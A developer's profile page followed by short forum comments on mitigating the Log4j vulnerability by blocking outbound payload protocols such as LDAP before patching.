I am a cloud application architect with 10 years' experience in software development in several languages, including Perl, Java and C#. I'm an Irishman living in Calgary, Canada. GitHub on @cubikca.
Location
Calgary, Canada
Education
BSc. Computing and Info Systems, Athabasca University
Unfortunately there's no way of knowing if a third-party vendor has a weird logging configuration and a vulnerable version of Log4j. This makes update #3 now. My company's approach was to block the payload protocols to external hosts first, then focus on finding and patching. This has worked well for us: all logged attempts were blocked and would have used LDAP anyway, which was blocked.
Unfortunately there's no way of knowing if a third-party vendor has a weird logging configuration and a vulnerable version of Log4j. This makes update #3 now. My company's approach was to block the payload protocols to external hosts first, then focus on finding and patching. This has worked well for us: all logged attempts were blocked and would have used LDAP anyway, which was blocked.
Exactly. It's available to detect Log4j version and configuration and also update it only when you are able to own it or at least customize.
Thank you for sharing knowledge and effort of your company😃